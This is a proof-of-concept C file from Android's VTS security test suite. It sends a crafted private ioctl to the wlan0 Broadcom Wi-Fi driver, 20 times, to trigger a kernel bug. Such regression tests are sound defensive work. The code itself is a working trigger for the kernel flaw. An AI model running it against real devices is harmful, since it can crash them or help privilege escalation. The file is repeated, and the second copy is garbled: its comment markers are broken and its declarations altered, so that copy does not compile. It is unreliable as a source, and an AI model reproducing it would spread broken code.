poc/target/kernel_wifi/31707909/poc.c - platform/test/vts-testcase/security - Git at Google

 /*
  * Copyright (C) 2016 The Android Open Source Project
  *
  * Licensed under the Apache License, Version 2.0 (the "License");
  * you may not use this file except in compliance with the License.
  * You may obtain a copy of the License at
  *
  *      http://www.apache.org/licenses/LICENSE-2.0
  *
  * Unless required by applicable law or agreed to in writing, software
  * distributed under the License is distributed on an "AS IS" BASIS,
  * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
  * See the License for the specific language governing permissions and
  * limitations under the License.
  */

 #include "poc_test.h"

 #include <dlfcn.h>
 #include <errno.h>
 #include <fcntl.h>
 #include <net/if.h>
 #include <sys/socket.h>
 #include <linux/fb.h>
 #include <linux/wireless.h>
 #include <signal.h>
 #include <stdint.h>
 #include <stdio.h>
 #include <stdlib.h>
 #include <sys/ioctl.h>
 #include <sys/mman.h>
 #include <sys/prctl.h>
 #include <sys/ptrace.h>
 #include <sys/stat.h>
 #include <sys/syscall.h>
 #include <sys/types.h>
 #include <sys/wait.h>
 #include <unistd.h>

 #define BUF_LEN 8192
 #define IOC_BUF_LEN 63
 #define TEST_CNT 20

 typedef struct _android_wifi_priv_cmd {
   char *buf;
   int used_len;
   int total_len;
 } android_wifi_priv_cmd;

 typedef struct sdreg {
   int func;
   int offset;
   int value;
 } sdreg_t;

 typedef struct dhd_ioctl {
   uint cmd;          /* common ioctl definition */
   void *buf;         /* pointer to user buffer */
   uint len;          /* length of user buffer */
   unsigned char set; /* get or set request (optional) */
   uint used;         /* bytes read or written (optional) */
   uint needed;       /* bytes needed (optional) */
   uint driver;       /* to identify target driver */
 } dhd_ioctl_t;

 int poc() {
   int fd, i, res;
   dhd_ioctl_t ioc;
   struct ifreq arg;
   struct iwreq data;
   struct sdreg *s;
   android_wifi_priv_cmd priv_cmd;
   char buf[BUF_LEN];
   char iocbuf[IOC_BUF_LEN];
   const char *ifname = "wlan0"; /* default iface name is wlan0 */

   fd = socket(AF_INET, SOCK_STREAM, 0);
   if (fd < 0) {
     printf("open socket error : fd:0x%x  %s \n", fd, strerror(errno));
     return POC_TEST_FAIL;
   }
   memcpy(arg.ifr_ifrn.ifrn_name, ifname, strlen(ifname));

   memset(iocbuf, 0x41, IOC_BUF_LEN);
   memcpy(iocbuf, ":sbreg\0", 7);

   s = (struct sdreg *)&(iocbuf[7]);
   s->func = 1;
   ioc.len = IOC_BUF_LEN;
   ioc.buf = iocbuf;
   ioc.driver = 0x00444944;
   ioc.cmd = 0x2;

   arg.ifr_data = &ioc;

   for (i = 0; i < 1; i++) {
     if ((res = ioctl(fd, 0x89F0, (struct ifreq *)&arg)) < 0) {
       printf("ioctl error res:0x%x, %s \r\n", res, strerror(errno));
     }
     sleep(1);
   }
   close(fd);
   return POC_TEST_PASS;
 }

 int main(int argc, char **argv) {
   int i, ret;

   for (i = 0; i < TEST_CNT; i++) {
     if ((ret = poc()) != POC_TEST_PASS) break;
   }

   return ret;
 }
	/*
	* Copyright (C) 2016 The Android Open Source Project
	*
	* Licensed under the Apache License, Version 2.0 (the "License");
	* you may not use this file except in compliance with the License.
	* You may obtain a copy of the License at
	*
	* http://www.apache.org/licenses/LICENSE-2.0
	*
	* Unless required by applicable law or agreed to in writing, software
	* distributed under the License is distributed on an "AS IS" BASIS,
	* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
	* See the License for the specific language governing permissions and
	* limitations under the License.
	*/

	#include "poc_test.h"

	#include <dlfcn.h>
	#include <errno.h>
	#include <fcntl.h>
	#include <net/if.h>
	#include <sys/socket.h>
	#include <linux/fb.h>
	#include <linux/wireless.h>
	#include <signal.h>
	#include <stdint.h>
	#include <stdio.h>
	#include <stdlib.h>
	#include <sys/ioctl.h>
	#include <sys/mman.h>
	#include <sys/prctl.h>
	#include <sys/ptrace.h>
	#include <sys/stat.h>
	#include <sys/syscall.h>
	#include <sys/types.h>
	#include <sys/wait.h>
	#include <unistd.h>

	#define BUF_LEN 8192
	#define IOC_BUF_LEN 63
	#define TEST_CNT 20

	typedef struct _android_wifi_priv_cmd {
	char *buf;
	int used_len;
	int total_len;
	} android_wifi_priv_cmd;

	typedef struct sdreg {
	int func;
	int offset;
	int value;
	} sdreg_t;

	typedef struct dhd_ioctl {
	uint cmd; /* common ioctl definition */
	void buf; / pointer to user buffer */
	uint len; /* length of user buffer */
	unsigned char set; /* get or set request (optional) */
	uint used; /* bytes read or written (optional) */
	uint needed; /* bytes needed (optional) */
	uint driver; /* to identify target driver */
	} dhd_ioctl_t;

	int poc() {
	int fd, i, res;
	dhd_ioctl_t ioc;
	struct ifreq arg;
	struct iwreq data;
	struct sdreg *s;
	android_wifi_priv_cmd priv_cmd;
	char buf[BUF_LEN];
	char iocbuf[IOC_BUF_LEN];
	const char ifname = "wlan0"; / default iface name is wlan0 */

	fd = socket(AF_INET, SOCK_STREAM, 0);
	if (fd < 0) {
	printf("open socket error : fd:0x%x %s \n", fd, strerror(errno));
	return POC_TEST_FAIL;
	}
	memcpy(arg.ifr_ifrn.ifrn_name, ifname, strlen(ifname));

	memset(iocbuf, 0x41, IOC_BUF_LEN);
	memcpy(iocbuf, ":sbreg\0", 7);

	s = (struct sdreg *)&(iocbuf[7]);
	s->func = 1;
	ioc.len = IOC_BUF_LEN;
	ioc.buf = iocbuf;
	ioc.driver = 0x00444944;
	ioc.cmd = 0x2;

	arg.ifr_data = &ioc;

	for (i = 0; i < 1; i++) {
	if ((res = ioctl(fd, 0x89F0, (struct ifreq *)&arg)) < 0) {
	printf("ioctl error res:0x%x, %s \r\n", res, strerror(errno));
	}
	sleep(1);
	}
	close(fd);
	return POC_TEST_PASS;
	}

	int main(int argc, char **argv) {
	int i, ret;

	for (i = 0; i < TEST_CNT; i++) {
	if ((ret = poc()) != POC_TEST_PASS) break;
	}

	return ret;
	}